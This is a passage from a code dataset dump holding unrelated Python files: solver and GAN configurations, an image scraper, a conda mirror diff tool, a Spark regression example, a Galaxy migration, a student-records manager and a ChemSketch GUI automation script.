Writer_V3.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"66294456","text":"from proteus.default_n import *\nimport ls_p as physics\nfrom proteus import (StepControl,\n TimeIntegration,\n NonlinearSolvers,\n LinearSolvers,\n LinearAlgebraTools)\nfrom proteus.mprans import NCLS\nfrom proteus import Context\nct = Context.get()\nnLevels = ct.nLevels\nparallelPartitioningType = ct.parallelPartitioningType\nnLayersOfOverlapForParallel = ct.nLayersOfOverlapForParallel\nrestrictFineSolutionToAllMeshes = ct.restrictFineSolutionToAllMeshes\ntriangleOptions = ct.triangleOptions\n\ntimeIntegration = TimeIntegration.BackwardEuler_cfl\nstepController = StepControl.Min_dt_controller\n\nfemSpaces = {0:ct.basis}\nelementQuadrature = ct.elementQuadrature\nelementBoundaryQuadrature = ct.elementBoundaryQuadrature\n\nmassLumping = False\nconservativeFlux = None\nnumericalFluxType = NCLS.NumericalFlux\nsubgridError = NCLS.SubgridError(physics.coefficients, ct.nd)\nshockCapturing = NCLS.ShockCapturing(physics.coefficients,\n ct.nd,\n shockCapturingFactor = ct.ls_shockCapturingFactor,\n lag = ct.ls_lag_shockCapturing)\n\nfullNewtonFlag = True\nmultilevelNonlinearSolver = NonlinearSolvers.Newton\nlevelNonlinearSolver = NonlinearSolvers.Newton\n\nnonlinearSmoother = None\nlinearSmoother = None\n\nmatrix = LinearAlgebraTools.SparseMatrix\n\nif ct.opts.parallel:\n multilevelLinearSolver = LinearSolvers.KSP_petsc4py\n levelLinearSolver = LinearSolvers.KSP_petsc4py\nelse:\n multilevelLinearSolver = LinearSolvers.LU\n levelLinearSolver = LinearSolvers.LU\n\nlinear_solver_options_prefix = 'ncls_'\nlevelNonlinearSolverConvergenceTest = 'r'\nlinearSolverConvergenceTest = 'r-true'\n\ntolFac = 0.0\nlinTolFac = 0.001\nl_atol_res = 0.001*ct.ls_nl_atol_res\nnl_atol_res = ct.ls_nl_atol_res\nuseEisenstatWalker = False#True\n\nmaxNonlinearIts = 50\nmaxLineSearches = 0\n","sub_path":"2d/oscillatingCylinder/ls_n.py","file_name":"ls_n.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300229427","text":"from __future__ import print_function\nfrom datasets import TextDataset\nfrom trainer import condGANTrainer as trainer\n\nimport os\nimport sys\nimport time\nimport random\nimport pprint\nimport datetime\nimport dateutil.tz\n\nimport numpy as np\n\nimport torch\nimport torchvision.transforms as transforms\n\ndir_path = (os.path.abspath(os.path.join(os.path.realpath(__file__), './.')))\nsys.path.append(dir_path)\n\n\nCONFIG_NAME = 'DMGAN'\nDATASET_NAME = 'birds'\nDATA_DIR = '../data/birds'\nGPU_ID = 0\nWORKERS = 4\nBRANCH_NUM = 3\nFLAG = True\nNET_G= ''\nB_NET_D= True\nB_VALIDATION = False\nBATCH_SIZE= 2\nMAX_EPOCH = 800\nSNAPSHOT_INTERVAL = 25\nDISCRIMINATOR_LR = 0.0002\nGENERATOR_LR = 0.0002\nNET_E = '../DAMSMencoders/bird/text_encoder200.pth'\nGAMMA1 = 4.0\nGAMMA2 = 5.0\nGAMMA3 = 10.0\nLAMBDA = 5.0\nDF_DIM = 32\nGF_DIM = 64\nZ_DIM = 100\nR_NUM = 2\nEMBEDDING_DIM = 256\nCAPTIONS_PER_IMAGE = 10\nCUDA = True\nBASE_SIZE = 64\nENCODER_LR: 0.0002\nRNN_GRAD_CLIP: 0.25\nWORDS_NUM = 2 \nRNN_TYPE = 'LSTM'\nCONDITION_DIM = 100\nB_ATTENTION = True\nB_DCGAN = False\n\n\ndef gen_example(wordtoix, algo):\n '''generate images from example sentences'''\n from nltk.tokenize import RegexpTokenizer\n filepath = '%s/example_filenames.txt' % (DATA_DIR)\n data_dic = {}\n with open(filepath, \"r\") as f:\n filenames = f.read().decode('utf8').split('\\n')\n for name in filenames:\n if len(name) == 0:\n continue\n filepath = '%s/%s.txt' % (DATA_DIR, name)\n with open(filepath, \"r\") as f:\n print('Load from:', name)\n sentences = f.read().decode('utf8').split('\\n')\n # a list of indices for a sentence\n captions = []\n cap_lens = []\n for sent in sentences:\n if len(sent) == 0:\n continue\n sent = sent.replace(\"\\ufffd\\ufffd\", \" \")\n tokenizer = RegexpTokenizer(r'\\w+')\n tokens = tokenizer.tokenize(sent.lower())\n if len(tokens) == 0:\n print('sent', sent)\n continue\n\n rev = []\n for t in tokens:\n t = t.encode('ascii', 'ignore').decode('ascii')\n if len(t) > 0 and t in wordtoix:\n rev.append(wordtoix[t])\n captions.append(rev)\n cap_lens.append(len(rev))\n max_len = np.max(cap_lens)\n\n sorted_indices = np.argsort(cap_lens)[::-1]\n cap_lens = np.asarray(cap_lens)\n cap_lens = cap_lens[sorted_indices]\n cap_array = np.zeros((len(captions), max_len), dtype='int64')\n for i in range(len(captions)):\n idx = sorted_indices[i]\n cap = captions[idx]\n c_len = len(cap)\n cap_array[i, :c_len] = cap\n key = name[(name.rfind('/') + 1):]\n data_dic[key] = [cap_array, cap_lens, sorted_indices]\n algo.gen_example(data_dic)\n\nif __name__ == \"__main__\":\n\n\n manualSeed = random.randint(1, 10000)\n random.seed(manualSeed)\n np.random.seed(manualSeed)\n torch.manual_seed(manualSeed)\n if CUDA:\n torch.cuda.manual_seed_all(manualSeed)\n torch.cuda.set_device(GPU_ID)\n torch.backends.cudnn.benchmark = True\n torch.backends.cudnn.deterministic = True\n print(\"Seed: %d\" % (manualSeed))\n\n now = datetime.datetime.now(dateutil.tz.tzlocal())\n timestamp = now.strftime('%Y_%m_%d_%H_%M_%S')\n output_dir = '../output/%s_%s_%s' % \\\n (DATASET_NAME,CONFIG_NAME, timestamp)\n\n split_dir, bshuffle = 'train', True\n if not FLAG:\n # bshuffle = False\n split_dir = 'test'\n\n # Get data loader\n imsize = BASE_SIZE * (2 ** (BRANCH_NUM - 1))\n image_transform = transforms.Compose([\n transforms.Scale(int(imsize * 76 / 64)),\n transforms.RandomCrop(imsize),\n transforms.RandomHorizontalFlip()])\n dataset = TextDataset(DATA_DIR, split_dir,\n base_size=BASE_SIZE,\n transform=image_transform)\n assert dataset\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=BATCH_SIZE,\n drop_last=True, shuffle=bshuffle, num_workers=int(WORKERS))\n\n # Define models and go to train/evaluate\n algo = trainer(output_dir, dataloader, dataset.n_words, dataset.ixtoword, dataset)\n\n start_t = time.time()\n if FLAG:\n algo.train()\n else:\n '''generate images from pre-extracted embeddings'''\n if B_VALIDATION:\n algo.sampling(split_dir) # generate images for the whole valid dataset\n else:\n gen_example(dataset.wordtoix, algo) # generate images for customized captions\n end_t = time.time()\n print('Total time for training:', end_t - start_t)\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158023742","text":"from tkinter import *\nfrom tkinter import messagebox, PhotoImage, filedialog\nimport requests\nfrom bs4 import BeautifulSoup\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass Window:\n\n def __init__(self, root):\n self.root = root\n self.root.title(\"ImageGrabber v0.101262020\")\n self.root.iconphoto(True, PhotoImage(file=\"./assets/logo.png\"))\n\n self.image_urls = []\n self.folder = \"\"\n self.target_URL = \"\"\n\n self.first_row = 0\n self.first_column = 0\n\n self.message = Label(root, text=\"Enter Target URL:\")\n self.message.grid(row = self.first_row, column = self.first_column,\n sticky = \"e\")\n\n # Text box for the target url\n self.entry_box = Entry(root, width=100)\n self.entry_box.grid(row=self.first_row,\n column=self.first_column + 1, pady=10)\n # Button to scrape image urls from the url\n self.get_url_button = Button(text=\"Get Images\", command=self.scrape_urls, width=12)\n self.get_url_button.grid(\n row=self.first_row, column=self.first_column + 2, sticky=\"w\")\n \n # Button to select a folder in which images will be saved\n self.file_button = Button(\n text=\"Open Folder\", command=self.get_folder, width=12)\n self.file_button.grid(\n row=self.first_row, column=self.first_column + 3, sticky=\"w\")\n\n # Button to start downloading images\n self.scrape_button = Button(text=\"Download Images\", command=self.save_images, width=24)\n self.scrape_button.grid(\n row=self.first_row + 1, column=self.first_column + 2, columnspan=2, sticky=\"s\")\n\n # Text box that shows the web-scraping results\n self.lines = 30\n self.text = Text(root, height=self.lines, width=80)\n self.text.grid(row = self.first_row + 2, column = self.first_column + 1,\n pady=10)\n\n # Scrollbar for the text box\n self.scroll_bar = Scrollbar(root)\n self.scroll_bar.grid(row = self.first_row + 2, column = self.first_column + 2, sticky=\"w\") \n self.text.configure(yscrollcommand=self.scroll_bar.set)\n self.scroll_bar.configure(command=self.text.yview)\n\n def get_folder(self):\n \"\"\"\n Lets users choose destination folder \n \"\"\"\n self.folder = filedialog.askdirectory(initialdir=\"/\")\n if self.folder:\n displayed_text = \"Selected Destination: \" + \"\\n\" + self.folder\n else:\n displayed_text = \"Please Select a Folder\"\n label = Label(root, text=displayed_text, bg='#7EDC84')\n label.grid(row=self.first_row + 1, column=self.first_column + 1)\n\n def scrape_urls(self):\n \"\"\"\n Makes request to the target url and gets all the links to images\n \"\"\"\n target_url = self.entry_box.get()\n prefix_target_url = target_url.split(\"/\")[:3]\n prefix_target_url = \"/\".join(prefix_target_url)\n headers = {'User-Agent': 'Mozilla/5.0'}\n response = requests.get(target_url, headers=headers)\n soup = BeautifulSoup(response.text, \"html.parser\")\n images = soup.find_all(\"img\")\n\n for image in images:\n if image.get(\"src\", 0) != 0:\n source = image[\"src\"]\n else:\n source = image[\"data-src\"]\n self.image_urls.append(source)\n \n self.text.insert(END, f\"Scraping {target_url}...\")\n\n self.image_urls = [image for image in self.image_urls if image.endswith(\"jpg\") or image.endswith(\"png\") or image.endswith(\"gif\")]\n self.image_urls = [prefix_target_url + image if \"http\" not in image else image for image in self.image_urls ]\n self.image_urls = list(set(self.image_urls))\n self.text.delete(1.0, END)\n self.text.insert(END, f\"Successfully scraped {len(self.image_urls)} images.\")\n self.text.insert(END, \"\\n\" + \"|\")\n\n for image in self.image_urls:\n self.text.insert(END, \"\\n\")\n self.text.insert(END, f\"|--{image}\")\n self.text.insert(END, \"\\n\" + \"|\")\n\n def download_image(self, image_url):\n \"\"\"\n Makes request to the target url and gets all the links to images\n \"\"\"\n response = requests.get(image_url)\n filename = image_url.split(\"/\")[-1]\n if \".\" not in filename:\n filename = filename + \".jpeg\"\n with open(f\"{self.folder}/{filename}\", \"wb\") as f:\n f.write(response.content)\n\n def save_images(self):\n \"\"\"\n saving images taking advantage of multi-thread pool\n \"\"\"\n self.text.insert(END, \"--Started Saving Files.....\")\n with ThreadPoolExecutor() as executor:\n executor.map(self.download_image, self.image_urls)\n messagebox.showinfo(title=\"Operation Completed\",\n message=f\"Successfully saved {len(self.image_urls)} images\")\n\nif __name__ == \"__main__\":\n try:\n root = Tk()\n # root.tk.call('tk', 'scaling', 1.5)\n window = Window(root)\n root.mainloop()\n\n except KeyboardInterrupt:\n root.destroy()\n","sub_path":"image_grabber.py","file_name":"image_grabber.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"522681916","text":"import os\nimport sys\nimport json\nimport hashlib\nimport tarfile\nfrom os.path import abspath, isdir, join, relpath\n\n\n__version__ = '1.0.0'\nverbose = False\nmirror_dir = None\n\n\ndef md5_file(path):\n h = hashlib.new('md5')\n with open(path, 'rb') as fi:\n while 1:\n chunk = fi.read(262144)\n if not chunk:\n break\n h.update(chunk)\n return h.hexdigest()\n\ndef find_repos():\n for root, unused_dirs, files in os.walk(mirror_dir):\n if 'repodata.json' in files and 'repodata.json.bz2' in files:\n yield root\n\ndef all_repodata():\n d = {}\n for repo_path in find_repos():\n with open(join(repo_path, 'repodata.json')) as fi:\n index = json.load(fi)['packages']\n d[repo_path] = index\n return d\n\ndef verify_all_repos():\n d = all_repodata()\n for repo_path, index in d.items():\n for fn, info in index.items():\n path = join(repo_path, fn)\n if info['md5'] == md5_file(path):\n continue\n print('MD5 mismatch: %s' % path)\n\ndef write_reference(path):\n data = json.dumps(all_repodata(), indent=2, sort_keys=True)\n # make sure we have newline at the end\n if not data.endswith('\\n'):\n data += '\\n'\n with open(path, 'w') as fo:\n fo.write(data)\n\ndef read_reference():\n path = 'reference.json'\n try:\n with open(path) as fi:\n return json.load(fi)\n except FileNotFoundError:\n sys.exit('No such file: %s' % path)\n\ndef get_updates():\n d1 = read_reference()\n d2 = all_repodata()\n result = []\n for repo_path, index2 in d2.items():\n index1 = d1.get(repo_path, {})\n if index1 != index2:\n for fn in 'repodata.json', 'repodata.json.bz2':\n result.append(relpath(join(repo_path, fn), mirror_dir))\n for fn, info2 in index2.items():\n info1 = index1.get(fn, {})\n if info1.get('md5') != info2['md5']:\n result.append(relpath(join(repo_path, fn), mirror_dir))\n return result\n\ndef tar_repo():\n fn = 'update.tar'\n t = tarfile.open(fn, 'w')\n for f in get_updates():\n if verbose:\n print('adding: %s' % f)\n t.add(join(mirror_dir, f), f)\n t.close()\n print(\"Wrote: %s\" % fn)\n\ndef main():\n from optparse import OptionParser\n\n p = OptionParser(usage=\"usage: %prog [options] MIRROR_DIRECTORY\",\n description='create \"differential\" tarballs of a conda '\n 'mirror repository')\n\n p.add_option('--create',\n action=\"store_true\",\n help=\"create a differential tarball\")\n\n p.add_option('--reference',\n action=\"store_true\",\n help=\"create a reference point file and exit\")\n\n p.add_option('--show',\n action=\"store_true\",\n help=\"show the files in respect to the latest reference \"\n \"point file (which would be included in the \"\n \"differential tarball) and exit\")\n\n p.add_option('--verify',\n action=\"store_true\",\n help=\"verify the mirror repository and exit\")\n\n p.add_option('-v', '--verbose',\n action=\"store_true\")\n\n p.add_option('--version',\n action=\"store_true\",\n help=\"print version and exit\")\n\n opts, args = p.parse_args()\n\n if opts.version:\n print(__version__)\n return\n\n if len(args) != 1:\n p.error('exactly one argument is required, try -h')\n\n global mirror_dir\n mirror_dir = abspath(args[0])\n if not isdir(mirror_dir):\n sys.exit(\"No such directory: %r\" % mirror_dir)\n\n if opts.verbose:\n global verbose\n verbose = True\n\n if opts.create:\n tar_repo()\n return\n\n if opts.verify:\n verify_all_repos()\n return\n\n if opts.show:\n for path in get_updates():\n print(path)\n return\n\n if opts.reference:\n write_reference('reference.json')\n return\n\n print(\"Nothing done.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"mk_diff_tar.py","file_name":"mk_diff_tar.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222192197","text":"import numpy as np\n\n\ndef binarize(X, y, a_percentile, b_percentile):\n \"\"\" Splits data to be smaller than the a_percentil and larger than b_percentile\n :param x: input\n :param y: labels\n :param a_percentile:\n :param b_percentile:\n :return:\n :rtype: X, Y\n \"\"\"\n data_index = ((a_percentile >= y) | (y >= b_percentile))\n y = y[data_index]\n x=X[data_index[:, 0]]\n\n\n y[y <= a_percentile] = 0\n y[y >= b_percentile] = 1\n\n return x, np.expand_dims(y, 1)\n\n\ndef test_accuracy(y_pred, y_true):\n \"\"\" Compute test error / accuracy\n Params:\n ------\n y_pred: model prediction\n y_true: ground truth values\n return:\n ------\n Accuracy / error on test set\n \"\"\"\n\n # Apply threshold\n threshold = 0.50\n\n y_binary = np.zeros_like((y_pred))\n y_binary[y_pred >= threshold] = 1\n y_binary[y_pred < threshold] = 0\n\n # Get final predictions.\n y_binary = y_binary.flatten().astype(int)\n y_true = y_true.flatten().astype(int)\n\n acc = (y_binary == y_true).mean()\n return acc\n\n","sub_path":"exercise2/exercise_04/exercise_code/networks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69498404","text":"\"\"\"\r\nThien Pham\r\nAssignment #10\r\nCOSC 1306\r\n\"\"\"\r\nimport time\r\nstart = time.time()\r\nresult = {}\r\n\r\nfor perimeter in range(12,2019,2):\r\n for a in range(1,perimeter//3):\r\n for b in range(a+1,perimeter//2):\r\n c = perimeter - a - b\r\n if (a*b)%12 ==0 and a**2 + b**2 == c**2:\r\n if perimeter not in result:\r\n result[perimeter] = []\r\n result[perimeter].append((a,b,c))\r\n \r\nlength = []\r\n\r\nmaximum = []\r\n\r\nfor x in result:\r\n length.append(int(len(result[x])))\r\n maximum.append(x)\r\n\r\nend = time.time()\r\nprint(\"=\"*80)\r\nprint(\"The perimeter of\",maximum[length.index(max(length))],\"gives\",len(result[maximum[length.index(max(length))]]),\"combinations\")\r\nprint(\"=\"*80)\r\nprint(\"The triangles are:\")\r\nfor i in result[maximum[length.index(max(length))]]:\r\n print(i)\r\nprint(\"=\"*80)\r\n\r\nprint(\"Elapsed time:\",end - start)","sub_path":"COSC_1306/Assignment#10.py","file_name":"Assignment#10.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531241950","text":"# linear-regression.py\n# August 9, 2020\n#\n#\n\nfrom __future__ import print_function\n\n# DataFrame APIs in ml library, not MLLib\nfrom pyspark.ml.regression import LinearRegression\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.linalg import Vectors\n\nif __name__ == \"__main__\":\n spark = SparkSession.builder.appName(\"LinearRegression\").getOrCreate()\n\n # Load data and convert it to the format MLLib expects\n # (label (feature, feature, feature, ...))\n # (any type?, dense? Vector)\n inputLines = spark.sparkContext.textFile(\"regression.txt\")\n data = inputLines.map(lambda x: x.split(\",\")).map(lambda x: (float(x[0]), Vectors.dense(float(x[1]))))\n\n # Convert RDD to DataFrame\n # If you are importing data from a structured source, such as a database or\n # JSON, you can read it directly into a DataFrame\n colNames = [\"label\", \"features\"]\n df = data.toDF(colNames)\n\n # Split data into training and testing data\n trainTest = df.randomSplit([0.5, 0.5])\n trainingDF = trainTest[0]\n testDF = trainTest[1]\n\n # Create linear regression model\n lir = LinearRegression(maxIter=10, regParam=0.3, elasticNetParam=0.8)\n\n # Train the model\n model = lir.fit(trainingDF)\n\n # Evaluate model on testing data\n # Generate predictions using out linear regression model for all features in\n # our test dataframe\n fullPredictions = model.transform(testDF).cache()\n\n # Extract the predictions and the \"known\" correct labels\n predictions = fullPredictions.select(\"prediction\").rdd.map(lambda x: x[0])\n labels = fullPredictions.select(\"label\").rdd.map(lambda x: x[0])\n\n predictionAndLabel = predictions.zip(labels).collect()\n\n # Print results\n for example in predictionAndLabel:\n print(example)\n\n","sub_path":"spark_python/46-dataframes-with-mllib/linear-regression.py","file_name":"linear-regression.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452017639","text":"\"\"\"\nMigration script to alter the type of the tool_dependency.version column from TrimmedString(40) to Text.\n\"\"\"\nfrom __future__ import print_function\n\nimport logging\nimport sys\n\nfrom sqlalchemy import MetaData, Table\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nhandler = logging.StreamHandler(sys.stdout)\nformat = \"%(name)s %(levelname)s %(asctime)s %(message)s\"\nformatter = logging.Formatter(format)\nhandler.setFormatter(formatter)\nlog.addHandler(handler)\nmetadata = MetaData()\n\n\ndef upgrade(migrate_engine):\n metadata.bind = migrate_engine\n print(__doc__)\n metadata.reflect()\n Table(\"tool_dependency\", metadata, autoload=True)\n # Change the tool_dependency table's version column from TrimmedString to Text.\n if migrate_engine.name in ['postgres', 'postgresql']:\n cmd = \"ALTER TABLE tool_dependency ALTER COLUMN version TYPE Text;\"\n elif migrate_engine.name == 'mysql':\n cmd = \"ALTER TABLE tool_dependency MODIFY COLUMN version Text;\"\n else:\n # We don't have to do anything for sqlite tables. From the sqlite documentation at http://sqlite.org/datatype3.html:\n # 1.0 Storage Classes and Datatypes\n # Each value stored in an SQLite database (or manipulated by the database engine) has one of the following storage classes:\n # NULL. The value is a NULL value.\n # INTEGER. The value is a signed integer, stored in 1, 2, 3, 4, 6, or 8 bytes depending on the magnitude of the value.\n # REAL. The value is a floating point value, stored as an 8-byte IEEE floating point number.\n # TEXT. The value is a text string, stored using the database encoding (UTF-8, UTF-16BE or UTF-16LE).\n # BLOB. The value is a blob of data, stored exactly as it was input.\n cmd = None\n if cmd:\n try:\n migrate_engine.execute(cmd)\n except Exception:\n log.exception(\"Altering tool_dependency.version column from TrimmedString(40) to Text failed.\")\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n # Not necessary to change column type Text to TrimmedString(40).\n pass\n","sub_path":"lib/galaxy/model/migrate/versions/0100_alter_tool_dependency_table_version_column.py","file_name":"0100_alter_tool_dependency_table_version_column.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613569219","text":"\n\nimport time\n\n\n# ----------学生信息录入----------\ndef info_input():\n _lst = []\n n = 1\n while True:\n name = input(\"学生\" + str(n) + \"姓名:\")\n if not name:\n break\n age = int(input(\"学生\" + str(n) + \"年龄:\"))\n score = int(input(\"学生\" + str(n) + \"成绩:\"))\n d = {\"name\":name, \"age\":age, \"score\":score}\n _lst.append(d)\n n += 1\n return _lst\n\n\n# ----------打印学生信息----------\ndef print_info(curList):\n # 打印边线\n def print_frame():\n print(\"+\" + (12 * \"-\" + \"+\") * 3)\n\n def print_title():\n title = \"|\" + \"Name\".center(12) + \"|\" + \"Age\".center(12) \\\n + \"|\" + \"Score\".center(12) + \"|\"\n print_frame()\n print(title)\n print_frame()\n\n print(\"请稍后. . .\")\n time.sleep(2)\n print_title()\n for d in curList:\n fmt = \"|\" + d[\"name\"].center(12) + \"|\" + str(d[\"age\"]).center(12) \\\n + \"|\" + str(d[\"score\"]).center(12) + \"|\"\n print(fmt)\n print_frame()\n\n\n# ----------按分数线学生信息----------\ndef find_score_line(lst, score_line):\n _lst = [x for x in lst if x[\"score\"] >= score_line]\n if len(_lst):\n print_info(_lst)\n else:\n print(\"没有学生达到分数线!\")\n\n\n# -----按成绩排序-----\ndef sort_score_desc(lst, rev=False):\n def scoreKey(d):\n return d[\"score\"]\n _lst = sorted(read_info(filename, mode, 1), key=scoreKey, reverse=rev)\n if rev:\n print(\"*****按成绩从高到低排序*****\")\n else:\n print(\"*****按成绩从低到高排序*****\")\n print_info(_lst)\n\n\n# -----按年龄排序-----\ndef sort_age_desc(lst, rev=False):\n def myage(d):\n return d[\"age\"]\n lage = sorted(read_info(filename, mode, 1), key=myage, reverse=rev)\n if rev:\n print(\"*****按年龄从高到低排序*****\")\n else:\n print(\"*****按年龄从低到高排序*****\")\n print_info(lage)\n\n\n# ----------删除学生信息----------\ndef del_info(filename, mode):\n name = input(\"输入学生姓名:\")\n if name != '':\n try:\n fr = open(filename, mode)\n b1 = bytes(name,'utf-8')\n for line in fr:\n if b1 in line:\n fr.seek(-len(line),1)\n\n fr.write(b'')\n break\n else:\n print(\"没有找到这名学生!\")\n fr.flush()\n fr.close()\n except Exception:\n print(\"文件操作异常\")\n else:\n print(\"学生姓名不能为空\")\n\n\n# ----------修改学生信息----------\ndef chage_info():\n try:\n name = input(\"输入学生姓名:\")\n fr = get_file_stream('r+b')\n fw = None\n flagL = fr.readlines()\n for x in range(len(flagL)):\n if name in flagL[x]:\n score = int(input(\"输入新成绩:\"))\n l = flagL[x].split(',')\n flagL[x] = l[0] + ',' + str(l[1]) + ',' + str(score) + '\\n'\n fw = get_file_stream('w+b')\n fw.writelines(flagL)\n break\n else:\n print(\"没有找到这名学生!\")\n return False\n except:\n print(\"文件操作异常\")\n return False\n finally:\n fr.close()\n if fw != None:\n fw.close()\n return True\n\n\n# --------读取信息返回列表---------\ndef read_info(filename, mode, type=0):\n try:\n f = open(filename, mode)\n _lst = f.readlines()\n if len(_lst) > 0:\n _lst1 = []\n for s in _lst:\n if s != '\\n': \n l = s.split(',')\n d = {'name':l[0], 'age':l[1], 'score':l[2][:-1]}\n _lst1.append(d)\n if type == 0:\n print_info(_lst1)\n else:\n return _lst1\n else:\n print(\"学生信息为空\")\n f.close()\n except:\n print(\"文件操作异常\")\n\n\n# ----------保存信息到文件----------\ndef save_info_file(lst, filename, mode='a+'):\n if len(lst) > 0:\n try:\n f = open(filename, mode)\n for x in lst:\n s = \"%s,%d,%d\\r\\n\" % (x[\"name\"], x['age'], x['score'])\n f.write(bytes(s, 'utf-8'))\n f.flush()\n f.close()\n except IOError:\n print(\"文件操作异常\")\n return False\n else:\n print(\"学生信息为空\")\n return False\n return True\n","sub_path":"student/v_file/m_student.py","file_name":"m_student.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130241530","text":"from pywinauto import application\r\nimport os\r\nimport re\r\n\r\napp = application.Application()\r\napp.start(r\"C:/ACD2018FREE/CHEMSK.EXE\")\r\n\r\ndlg_spec = app.window(title='ACD/Labs Products')\r\ndlg_spec[\"OK\"].click()\r\n\r\ndlg_spec = app.window(title='ACD/ChemSketch (Freeware) - [noname01.sk2]')\r\ndlg_spec.type_keys('%FO')\r\n\r\ndlg_spec = app.window(title='Open Document')\r\ndlg_spec.Edit.set_text( \"0000.sk2\" )\r\ndlg_spec.type_keys('{ENTER}')\r\n\r\n\r\n \r\n####################################\r\ndef ACD_save_mol(save_mol_name,SMILES_str):\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n dlg_spec.type_keys('%PD')\r\n dlg_spec.type_keys('%TGM')\r\n\r\n dlg_spec = app.window(title='Generate Structure from SMILES')\r\n dlg_spec.Edit.set_text(SMILES_str)\r\n dlg_spec[\"OK\"].click()\r\n\r\n\r\n try:\r\n dlg_spec = app.window(title=r'Warning')\r\n dlg_spec.type_keys('Y')\r\n dlg_spec.type_keys('{ENTER}')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n except:\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n #dlg_spec.click_input(button='left', coords=(800, 600))\r\n\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n dlg_spec.click_input(button='left', coords=(800, 600))\r\n\r\n dlg_spec.type_keys('%T3')\r\n\r\n try:\r\n dlg_spec = app.window(title=r'3D Structure Optimization')\r\n dlg_spec.type_keys('Y')\r\n dlg_spec.type_keys('{ENTER}')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n except:\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n\r\n try:\r\n dlg_spec = app.window(title=r'Warning')\r\n dlg_spec.type_keys('Y')\r\n dlg_spec.type_keys('{ENTER}')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n except:\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n\r\n\r\n \r\n dlg_spec.type_keys('%FE')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n dlg_spec = app.window(title='Export')\r\n\r\n\r\n dlg_spec[\"保存类型(&T):ComboBox\"].select(0)\r\n dlg_spec.type_keys('%N')\r\n dlg_spec.Edit.set_text( save_mol_name )\r\n dlg_spec.type_keys('{ENTER}')\r\n \r\n\r\n####################################\r\n\r\n\r\nfloder = \"C:/Users/Administrator/Desktop/hubChem/lstm_mol/tox21/\"\r\natom_type = [ \"H\",\"C\", \"N\",\"O\",\"F\",\"P\",\"S\",\"Cl\",\"Br\",\"I\"]\r\n\r\n\r\n\r\nfiles = os.listdir (floder)\r\n\r\n\r\nfor count ,file in enumerate(files[1934:2100]):\r\n print(count ,file)\r\n with open( floder+ file,\"r\") as f:\r\n SMILES_str = f.readlines()[0]\r\n print(SMILES_str )\r\n if \".\" not in SMILES_str and \"Cu\" not in SMILES_str and \"Hg\" not in SMILES_str and \"Pt\" not in SMILES_str and \"Bi\" not in SMILES_str and \"Ir\" not in SMILES_str and \"M\" not in SMILES_str:\r\n\r\n ACD_save_mol( file,SMILES_str )\r\n #if \".\" in SMILES_str: \r\n #ACD_save_mol( file,SMILES_str )\r\n \r\n #os.remove(floder+\"0000.mol\")\r\n","sub_path":"pyauto6_tox21.py","file_name":"pyauto6_tox21.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396844713","text":"import sys\n\nimport argparse\nimport time\nimport pickle as pkl\nimport functools\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom 